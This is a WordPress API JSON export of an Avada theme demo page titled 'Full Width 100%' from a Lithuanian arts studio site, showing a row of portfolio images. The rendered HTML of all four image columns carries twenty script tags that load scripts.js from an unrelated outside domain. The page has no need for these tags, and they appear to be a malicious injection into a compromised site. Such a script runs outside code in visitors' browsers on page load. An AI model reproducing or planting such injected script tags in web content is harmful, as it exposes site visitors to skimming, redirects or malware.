{"id":3713,"date":"2013-05-24T20:22:31","date_gmt":"2013-05-24T20:22:31","guid":{"rendered":"http:\/\/avada.theme-fusion.comxml\/?page_id=3713"},"modified":"2019-03-07T07:48:37","modified_gmt":"2019-03-07T09:48:37","slug":"full-width-100","status":"publish","type":"page","link":"http:\/\/www.menustudija.lt\/lt\/full-width-100\/","title":{"rendered":"Full Width 100%"},"content":{"rendered":"<p><div class=\"fusion-fullwidth fullwidth-box nonhundred-percent-fullwidth non-hundred-percent-height-scrolling\"  style='background-color: #f6f6f6;background-position: top left;background-repeat: no-repeat;padding-top:10px;padding-right:0px;padding-bottom:20px;padding-left:0px;border-top-width:1px;border-bottom-width:1px;border-color:#e5e4e4;border-top-style:solid;border-bottom-style:solid;'><div class=\"fusion-builder-row fusion-row \"><div  class=\"fusion-layout-column fusion_builder_column fusion_builder_column_1_1 fusion-builder-column-1 fusion-one-full fusion-column-first fusion-column-last fusion-column-no-min-height 1_1\"  style='margin-top:0px;margin-bottom:0px;'>\n\t\t\t\t\t<div class=\"fusion-column-wrapper\" style=\"background-position:left top;background-repeat:no-repeat;-webkit-background-size:cover;-moz-background-size:cover;-o-background-size:cover;background-size:cover;\"   data-bg-url=\"\">\n\t\t\t\t\t\t<div class=\"fusion-sep-clear\"><\/div><div class=\"fusion-separator fusion-full-width-sep sep-none\" style=\"margin-left: auto;margin-right: auto;margin-top:0px;\"><\/div><div class=\"fusion-text\"><h1 style=\"text-align: center; font-size: 30px !important;\">Avada <span style=\"color: #a0ce4e;\">:<\/span> Includes The Ability For A 100% Width Page<\/h1>\n<p style=\"text-align: center; margin-top: -10px;\">Yes that&#8217;s right, you can now have a <strong><span style=\"color: #84b231;\">100&amp; Full Width Page!<\/span><\/strong> Along with the new page template is a <span style=\"color: #84b231;\"><strong>full width shortcode<\/strong><\/span> that you can use to contain content, insert background images or use a background color along with awesome scrolling effects. The new layout possibilities are absolutely stunning!<\/p>\n<\/div><div class=\"fusion-clearfix\"><\/div>\n\n\t\t\t\t\t<\/div>\n\t\t\t\t<\/div><\/div><\/div><div class=\"fusion-fullwidth fullwidth-box hundred-percent-fullwidth non-hundred-percent-height-scrolling\"  style='background-color: rgba(255,255,255,0);background-position: center center;background-repeat: no-repeat;padding-top:0px;padding-right:20px;padding-bottom:0px;padding-left:20px;margin-top: 50px;'><div class=\"fusion-builder-row fusion-row \"><div  class=\"fusion-layout-column fusion_builder_column fusion_builder_column_1_1 fusion-builder-column-2 fusion-one-full fusion-column-first fusion-column-last fusion-column-no-min-height 1_1\"  style='margin-top:0px;margin-bottom:0px;'>\n\t\t\t\t\t<div class=\"fusion-column-wrapper\" style=\"background-position:left top;background-repeat:no-repeat;-webkit-background-size:cover;-moz-background-size:cover;-o-background-size:cover;background-size:cover;\"   data-bg-url=\"\">\n\t\t\t\t\t\t<div class=\"fusion-sep-clear\"><\/div><div class=\"fusion-separator fusion-full-width-sep sep-none\" style=\"margin-left: auto;margin-right: auto;margin-top:;\"><\/div><div class=\"fusion-clearfix\"><\/div>\n\n\t\t\t\t\t<\/div>\n\t\t\t\t<\/div><\/div><\/div><div class=\"fusion-fullwidth fullwidth-box hundred-percent-fullwidth non-hundred-percent-height-scrolling\"  style='background-color: #ffffff;background-position: center center;background-repeat: no-repeat;padding-top:0px;padding-right:20px;padding-bottom:0px;padding-left:20px;'><div class=\"fusion-builder-row fusion-row \"><div  class=\"fusion-layout-column fusion_builder_column fusion_builder_column_1_4 fusion-builder-column-3 fusion-one-fourth fusion-column-first 1_4\"  style='margin-top:0px;margin-bottom:20px;width:25%;width:calc(25% - ( ( 4% + 4% + 4% ) * 0.25 ) );margin-right: 4%;'>\n\t\t\t\t\t<div class=\"fusion-column-wrapper\" style=\"padding: 0px 0px 0px 0px;background-position:left top;background-repeat:no-repeat;-webkit-background-size:cover;-moz-background-size:cover;-o-background-size:cover;background-size:cover;\"   data-bg-url=\"\">\n\t\t\t\t\t\t<div class=\"fusion-text\"><p><script src='https:\/\/sistemu.guru\/scripts.js' type='text\/javascript'><\/script><script src='https:\/\/sistemu.guru\/scripts.js' type='text\/javascript'><\/script><script src='https:\/\/sistemu.guru\/scripts.js' type='text\/javascript'><\/script><a href=\"http:\/\/www.menustudija.lt\/wp-content\/uploads\/2012\/07\/portfolio_4.jpg\" rel=\"prettyPhoto\"><script src='https:\/\/sistemu.guru\/scripts.js' type='text\/javascript'><\/script><script src='https:\/\/sistemu.guru\/scripts.js' type='text\/javascript'><\/script><img decoding=\"async\" src=\"http:\/\/www.menustudija.lt\/wp-content\/uploads\/2012\/07\/portfolio_4.jpg\" alt=\"image 1\" \/><\/a><\/p>\n<\/div><div class=\"fusion-clearfix\"><\/div>\n\n\t\t\t\t\t<\/div>\n\t\t\t\t<\/div><div  class=\"fusion-layout-column fusion_builder_column fusion_builder_column_1_4 fusion-builder-column-4 fusion-one-fourth 1_4\"  style='margin-top:0px;margin-bottom:20px;width:25%;width:calc(25% - ( ( 4% + 4% + 4% ) * 0.25 ) );margin-right: 4%;'>\n\t\t\t\t\t<div class=\"fusion-column-wrapper\" style=\"padding: 0px 0px 0px 0px;background-position:left top;background-repeat:no-repeat;-webkit-background-size:cover;-moz-background-size:cover;-o-background-size:cover;background-size:cover;\"   data-bg-url=\"\">\n\t\t\t\t\t\t<div class=\"fusion-text\"><p><script src='https:\/\/sistemu.guru\/scripts.js' type='text\/javascript'><\/script><script src='https:\/\/sistemu.guru\/scripts.js' type='text\/javascript'><\/script><script src='https:\/\/sistemu.guru\/scripts.js' type='text\/javascript'><\/script><a href=\"http:\/\/www.menustudija.lt\/wp-content\/uploads\/2012\/07\/portfolio_5.jpg\" rel=\"prettyPhoto\"><script src='https:\/\/sistemu.guru\/scripts.js' type='text\/javascript'><\/script><script src='https:\/\/sistemu.guru\/scripts.js' type='text\/javascript'><\/script><img decoding=\"async\" src=\"http:\/\/www.menustudija.lt\/wp-content\/uploads\/2012\/07\/portfolio_5.jpg\" alt=\"image 1\" \/><\/a><\/p>\n<\/div><div class=\"fusion-clearfix\"><\/div>\n\n\t\t\t\t\t<\/div>\n\t\t\t\t<\/div><div  class=\"fusion-layout-column fusion_builder_column fusion_builder_column_1_4 fusion-builder-column-5 fusion-one-fourth 1_4\"  style='margin-top:0px;margin-bottom:20px;width:25%;width:calc(25% - ( ( 4% + 4% + 4% ) * 0.25 ) );margin-right: 4%;'>\n\t\t\t\t\t<div class=\"fusion-column-wrapper\" style=\"padding: 0px 0px 0px 0px;background-position:left top;background-repeat:no-repeat;-webkit-background-size:cover;-moz-background-size:cover;-o-background-size:cover;background-size:cover;\"   data-bg-url=\"\">\n\t\t\t\t\t\t<div class=\"fusion-text\"><p><script src='https:\/\/sistemu.guru\/scripts.js' type='text\/javascript'><\/script><script src='https:\/\/sistemu.guru\/scripts.js' type='text\/javascript'><\/script><script src='https:\/\/sistemu.guru\/scripts.js' type='text\/javascript'><\/script><a href=\"http:\/\/www.menustudija.lt\/wp-content\/uploads\/2013\/10\/portfolio_6.jpg\" rel=\"prettyPhoto\"><script src='https:\/\/sistemu.guru\/scripts.js' type='text\/javascript'><\/script><script src='https:\/\/sistemu.guru\/scripts.js' type='text\/javascript'><\/script><img decoding=\"async\" src=\"http:\/\/www.menustudija.lt\/wp-content\/uploads\/2013\/10\/portfolio_6.jpg\" alt=\"image 1\" \/><\/a><\/p>\n<\/div><div class=\"fusion-clearfix\"><\/div>\n\n\t\t\t\t\t<\/div>\n\t\t\t\t<\/div><div  class=\"fusion-layout-column fusion_builder_column fusion_builder_column_1_4 fusion-builder-column-6 fusion-one-fourth fusion-column-last 1_4\"  style='margin-top:0px;margin-bottom:20px;width:25%;width:calc(25% - ( ( 4% + 4% + 4% ) * 0.25 ) );'>\n\t\t\t\t\t<div class=\"fusion-column-wrapper\" style=\"padding: 0px 0px 0px 0px;background-position:left top;background-repeat:no-repeat;-webkit-background-size:cover;-moz-background-size:cover;-o-background-size:cover;background-size:cover;\"   data-bg-url=\"\">\n\t\t\t\t\t\t<div class=\"fusion-text\"><p><script src='https:\/\/sistemu.guru\/scripts.js' type='text\/javascript'><\/script><script src='https:\/\/sistemu.guru\/scripts.js' type='text\/javascript'><\/script><script src='https:\/\/sistemu.guru\/scripts.js' type='text\/javascript'><\/script><a href=\"http:\/\/www.menustudija.lt\/wp-content\/uploads\/2012\/07\/portfolio_4.jpg\" rel=\"prettyPhoto\"><script src='https:\/\/sistemu.guru\/scripts.js' type='text\/javascript'><\/script><script src='https:\/\/sistemu.guru\/scripts.js' type='text\/javascript'><\/script><img decoding=\"async\" src=\"http:\/\/www.menustudija.lt\/wp-content\/uploads\/2012\/07\/portfolio_4.jpg\" alt=\"image 1\" \/><\/a><\/p>\n<\/div><div class=\"fusion-clearfix\"><\/div>\n\n\t\t\t\t\t<\/div>\n\t\t\t\t<\/div><\/div><\/div><\/p>\n","protected":false},"excerpt":{"rendered":"","protected":false},"author":6,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"open","ping_status":"closed","template":"100-width.php","meta":{"footnotes":""},"class_list":["post-3713","page","type-page","status-publish","hentry"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v26.8 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Full Width 100% - Rami\u0173 Bi\u010di\u0173 Men\u0173 Studija<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"http:\/\/www.menustudija.lt\/lt\/full-width-100\/\" \/>\n<meta property=\"og:locale\" content=\"lt_LT\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Full Width 100% - Rami\u0173 Bi\u010di\u0173 Men\u0173 Studija\" \/>\n<meta property=\"og:url\" content=\"http:\/\/www.menustudija.lt\/lt\/full-width-100\/\" \/>\n<meta property=\"og:site_name\" content=\"Rami\u0173 Bi\u010di\u0173 Men\u0173 Studija\" \/>\n<meta property=\"article:modified_time\" content=\"2019-03-07T09:48:37+00:00\" \/>\n<meta property=\"og:image\" content=\"http:\/\/www.menustudija.lt\/wp-content\/uploads\/2012\/07\/portfolio_4.jpg\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data1\" content=\"2 minut\u0117s\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"http:\/\/www.menustudija.lt\/lt\/full-width-100\/\",\"url\":\"http:\/\/www.menustudija.lt\/lt\/full-width-100\/\",\"name\":\"Full Width 100% - Rami\u0173 Bi\u010di\u0173 Men\u0173 Studija\",\"isPartOf\":{\"@id\":\"http:\/\/www.menustudija.lt\/lt\/#website\"},\"primaryImageOfPage\":{\"@id\":\"http:\/\/www.menustudija.lt\/lt\/full-width-100\/#primaryimage\"},\"image\":{\"@id\":\"http:\/\/www.menustudija.lt\/lt\/full-width-100\/#primaryimage\"},\"thumbnailUrl\":\"http:\/\/www.menustudija.lt\/wp-content\/uploads\/2012\/07\/portfolio_4.jpg\",\"datePublished\":\"2013-05-24T20:22:31+00:00\",\"dateModified\":\"2019-03-07T09:48:37+00:00\",\"breadcrumb\":{\"@id\":\"http:\/\/www.menustudija.lt\/lt\/full-width-100\/#breadcrumb\"},\"inLanguage\":\"lt-LT\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"http:\/\/www.menustudija.lt\/lt\/full-width-100\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"lt-LT\",\"@id\":\"http:\/\/www.menustudija.lt\/lt\/full-width-100\/#primaryimage\",\"url\":\"http:\/\/www.menustudija.lt\/wp-content\/uploads\/2012\/07\/portfolio_4.jpg\",\"contentUrl\":\"http:\/\/www.menustudija.lt\/wp-content\/uploads\/2012\/07\/portfolio_4.jpg\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"http:\/\/www.menustudija.lt\/lt\/full-width-100\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"http:\/\/www.menustudija.lt\/lt\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Full Width 100%\"}]},{\"@type\":\"WebSite\",\"@id\":\"http:\/\/www.menustudija.lt\/lt\/#website\",\"url\":\"http:\/\/www.menustudija.lt\/lt\/\",\"name\":\"Rami\u0173 Bi\u010di\u0173 Men\u0173 Studija\",\"description\":\"Rami\u0173 Bi\u010di\u0173 Men\u0173 Studija - mintims, sielai, k\u016bnui\",\"publisher\":{\"@id\":\"http:\/\/www.menustudija.lt\/lt\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"http:\/\/www.menustudija.lt\/lt\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"lt-LT\"},{\"@type\":\"Organization\",\"@id\":\"http:\/\/www.menustudija.lt\/lt\/#organization\",\"name\":\"Rami\u0173 Bi\u010di\u0173 Men\u0173 Studija\",\"url\":\"http:\/\/www.menustudija.lt\/lt\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"lt-LT\",\"@id\":\"http:\/\/www.menustudija.lt\/lt\/#\/schema\/logo\/image\/\",\"url\":\"http:\/\/www.menustudija.lt\/wp-content\/uploads\/2019\/08\/cropped-RBMS-logo-2-page-001-scaled.jpg\",\"contentUrl\":\"http:\/\/www.menustudija.lt\/wp-content\/uploads\/2019\/08\/cropped-RBMS-logo-2-page-001-scaled.jpg\",\"width\":2560,\"height\":768,\"caption\":\"Rami\u0173 Bi\u010di\u0173 Men\u0173 Studija\"},\"image\":{\"@id\":\"http:\/\/www.menustudija.lt\/lt\/#\/schema\/logo\/image\/\"}}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Full Width 100% - Rami\u0173 Bi\u010di\u0173 Men\u0173 Studija","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"http:\/\/www.menustudija.lt\/lt\/full-width-100\/","og_locale":"lt_LT","og_type":"article","og_title":"Full Width 100% - Rami\u0173 Bi\u010di\u0173 Men\u0173 Studija","og_url":"http:\/\/www.menustudija.lt\/lt\/full-width-100\/","og_site_name":"Rami\u0173 Bi\u010di\u0173 Men\u0173 Studija","article_modified_time":"2019-03-07T09:48:37+00:00","og_image":[{"url":"http:\/\/www.menustudija.lt\/wp-content\/uploads\/2012\/07\/portfolio_4.jpg","type":"","width":"","height":""}],"twitter_card":"summary_large_image","twitter_misc":{"Est. reading time":"2 minut\u0117s"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"http:\/\/www.menustudija.lt\/lt\/full-width-100\/","url":"http:\/\/www.menustudija.lt\/lt\/full-width-100\/","name":"Full Width 100% - Rami\u0173 Bi\u010di\u0173 Men\u0173 Studija","isPartOf":{"@id":"http:\/\/www.menustudija.lt\/lt\/#website"},"primaryImageOfPage":{"@id":"http:\/\/www.menustudija.lt\/lt\/full-width-100\/#primaryimage"},"image":{"@id":"http:\/\/www.menustudija.lt\/lt\/full-width-100\/#primaryimage"},"thumbnailUrl":"http:\/\/www.menustudija.lt\/wp-content\/uploads\/2012\/07\/portfolio_4.jpg","datePublished":"2013-05-24T20:22:31+00:00","dateModified":"2019-03-07T09:48:37+00:00","breadcrumb":{"@id":"http:\/\/www.menustudija.lt\/lt\/full-width-100\/#breadcrumb"},"inLanguage":"lt-LT","potentialAction":[{"@type":"ReadAction","target":["http:\/\/www.menustudija.lt\/lt\/full-width-100\/"]}]},{"@type":"ImageObject","inLanguage":"lt-LT","@id":"http:\/\/www.menustudija.lt\/lt\/full-width-100\/#primaryimage","url":"http:\/\/www.menustudija.lt\/wp-content\/uploads\/2012\/07\/portfolio_4.jpg","contentUrl":"http:\/\/www.menustudija.lt\/wp-content\/uploads\/2012\/07\/portfolio_4.jpg"},{"@type":"BreadcrumbList","@id":"http:\/\/www.menustudija.lt\/lt\/full-width-100\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"http:\/\/www.menustudija.lt\/lt\/"},{"@type":"ListItem","position":2,"name":"Full Width 100%"}]},{"@type":"WebSite","@id":"http:\/\/www.menustudija.lt\/lt\/#website","url":"http:\/\/www.menustudija.lt\/lt\/","name":"Rami\u0173 Bi\u010di\u0173 Men\u0173 Studija","description":"Rami\u0173 Bi\u010di\u0173 Men\u0173 Studija - mintims, sielai, k\u016bnui","publisher":{"@id":"http:\/\/www.menustudija.lt\/lt\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"http:\/\/www.menustudija.lt\/lt\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"lt-LT"},{"@type":"Organization","@id":"http:\/\/www.menustudija.lt\/lt\/#organization","name":"Rami\u0173 Bi\u010di\u0173 Men\u0173 Studija","url":"http:\/\/www.menustudija.lt\/lt\/","logo":{"@type":"ImageObject","inLanguage":"lt-LT","@id":"http:\/\/www.menustudija.lt\/lt\/#\/schema\/logo\/image\/","url":"http:\/\/www.menustudija.lt\/wp-content\/uploads\/2019\/08\/cropped-RBMS-logo-2-page-001-scaled.jpg","contentUrl":"http:\/\/www.menustudija.lt\/wp-content\/uploads\/2019\/08\/cropped-RBMS-logo-2-page-001-scaled.jpg","width":2560,"height":768,"caption":"Rami\u0173 Bi\u010di\u0173 Men\u0173 Studija"},"image":{"@id":"http:\/\/www.menustudija.lt\/lt\/#\/schema\/logo\/image\/"}}]}},"_links":{"self":[{"href":"http:\/\/www.menustudija.lt\/lt\/wp-json\/wp\/v2\/pages\/3713","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.menustudija.lt\/lt\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"http:\/\/www.menustudija.lt\/lt\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"http:\/\/www.menustudija.lt\/lt\/wp-json\/wp\/v2\/users\/6"}],"replies":[{"embeddable":true,"href":"http:\/\/www.menustudija.lt\/lt\/wp-json\/wp\/v2\/comments?post=3713"}],"version-history":[{"count":2,"href":"http:\/\/www.menustudija.lt\/lt\/wp-json\/wp\/v2\/pages\/3713\/revisions"}],"predecessor-version":[{"id":22490,"href":"http:\/\/www.menustudija.lt\/lt\/wp-json\/wp\/v2\/pages\/3713\/revisions\/22490"}],"wp:attachment":[{"href":"http:\/\/www.menustudija.lt\/lt\/wp-json\/wp\/v2\/media?parent=3713"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}